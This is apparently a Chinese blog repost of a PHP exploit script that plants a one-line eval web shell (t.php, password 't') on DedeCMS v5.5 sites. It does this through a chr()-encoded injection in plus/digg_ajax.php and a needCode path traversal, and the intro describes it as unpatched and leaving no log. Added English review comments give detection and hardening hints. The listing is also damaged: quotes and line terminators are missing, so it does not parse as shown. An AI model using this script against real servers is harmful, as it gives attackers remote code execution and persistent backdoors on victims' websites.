官方暂时没出补丁,不过我估计快了
执行成功后会在data/cache下生成t.php一句话小马,密码为t,
官方最新GBK和utf-8版本存在此漏洞,
此exp的特点是生成t.php的时候不留日志
// NOTE(review): this listing is damaged as shown. The string quotes are missing, and the
// HTTP strings further down have no line terminators, so it does not parse as PHP.
// The comments describe what the visible tokens indicate, for triage and detection.
// Start-up banner naming the affected product and version.
print_r(
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
);
// Two command-line arguments (host, path) are required; otherwise usage is printed and the script exits.
if ($argc < 3) {
print_r(
+----------------------------------------+
Usage: php .$argv[0]. host path
host: target server (ip/hostname)
path: path to dedecms
Example:
php .$argv[0]. localhost /dedecms/
+----------------------------------------+
);
exit;
}
// 7 = E_ERROR | E_WARNING | E_PARSE; the execution time limit is switched off.
error_reporting(7);
ini_set(max_execution_time, 0);
// Host and application path are taken verbatim from the command line.
$host = $argv[1];
$path = $argv[2];
// Request 1 (GET): plus/digg_ajax.php with an id value that is not a plain integer and that
// carries a PHP statement wrapped in comment delimiters. Every string in that statement is
// assembled from chr() calls, which spell a relative path to data/cache/t.php, a write mode and
// a one-line eval-on-POST stub keyed on parameter t, matching the page's description of the
// dropped file. Presumably chr() is used so the request needs no quote characters (unconfirmed).
// Detection: alert on digg_ajax.php requests whose id contains anything other than digits.
$post_a = plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*;
// Request 2 (POST body): needCode holds ../ segments ending at data/mysql_error_trace.
// NOTE(review): presumably request 1 leaves its text in that trace file and this parameter
// makes the application load it; the server-side code is not shown here, so confirm against
// the affected source. Detection: needCode values containing "/" or "..".
// Hardening to consider: cast id to an integer, restrict needCode to a fixed allowlist,
// and deny PHP execution under the data/ directory.
$post_b = needCode=aa/../../../data/mysql_error_trace;
// Path of the dropped file relative to the application root. An unexpected t.php under
// data/cache is the on-disk indicator to look for.
$shell = data/cache/t.php;
// Send request 1, then request 2 to plus/comments_frame.php; both responses are discarded.
get_send($post_a);
post_send(plus/comments_frame.php,$post_b);
// Verification probe: POSTs parameter t to the dropped file and keeps the raw response.
$content = post_send($shell,t=echo tojen;);
// Offsets 9-11 of a raw response are the status code in an "HTTP/1.1 NNN" status line.
// Only a 200 is checked; the echoed marker itself is never compared.
if(substr($content,9,3)==200){
echo "Shell Address is:".$host.$path.$shell;
}else{
echo "Error.";
}
// Sends one raw HTTP/1.1 GET request for $path.$url to $host on port 80 and returns
// everything read from the socket (status line, headers and body) as one string.
// $url is appended to the global $path without any encoding.
// NOTE(review): as shown, the header strings carry no line terminators and the initial
// value of $back is missing, presumably lost in extraction along with the quotes elsewhere.
function get_send($url){
// Target host and base path come from the script's globals, not from parameters.
global $host, $path;
$message = "GET ".$path."$url HTTP/1.1";
$message .= "Accept: */*";
$message .= "Referer: http://$host$path";
$message .= "Accept-Language: zh-cn";
$message .= "Content-Type: application/x-www-form-urlencoded";
// Fixed User-Agent string; together with the zh-cn Accept-Language it is a weak,
// easily changed indicator when reviewing web server logs.
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)";
$message .= "Host: $host";
// Connection: Close lets the read loop below end at EOF.
$message .= "Connection: Close";
// Plain TCP to port 80; no timeout argument is passed.
$fp = fsockopen($host, 80);
// NOTE(review): a failed connect only prints a message; execution continues and the
// calls below then operate on an invalid handle.
if(!$fp){
echo "Connect to host Error";
}
fputs($fp, $message);
$back = ;
// Read the response in 1024-byte chunks until the server closes the connection.
while (!feof($fp))
$back .= fread($fp, 1024);
fclose($fp);
return $back;
}
// Sends one raw HTTP/1.1 POST request for $path.$url to $host on port 80 with $cmd as the
// form-urlencoded body, and returns everything read from the socket as one string.
// $url and $cmd are used as given; no URL or form encoding is applied here.
// NOTE(review): as shown, the header strings carry no line terminators and the initial
// value of $back is missing, presumably lost in extraction along with the quotes elsewhere.
function post_send($url,$cmd){
// Target host and base path come from the script's globals, not from parameters.
global $host, $path;
$message = "POST ".$path."$url HTTP/1.1";
$message .= "Accept: */*";
$message .= "Referer: http://$host$path";
$message .= "Accept-Language: zh-cn";
$message .= "Content-Type: application/x-www-form-urlencoded";
// Fixed User-Agent string; a weak, easily changed indicator in web server logs.
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)";
$message .= "Host: $host";
// Content-Length is the byte length of the body (strlen counts bytes).
$message .= "Content-Length: ".strlen($cmd)."";
$message .= "Connection: Close";
// The body is appended directly after the headers.
$message .= $cmd;
// Plain TCP to port 80; no timeout argument is passed.
$fp = fsockopen($host, 80);
// NOTE(review): a failed connect only prints a message; execution continues and the
// calls below then operate on an invalid handle.
if(!$fp){
echo "Connect to host Error";
}
fputs($fp, $message);
$back = ;
// Read the response in 1024-byte chunks until the server closes the connection.
while (!feof($fp))
$back .= fread($fp, 1024);
fclose($fp);
return $back;
}
?>
本文来源于独自等待博客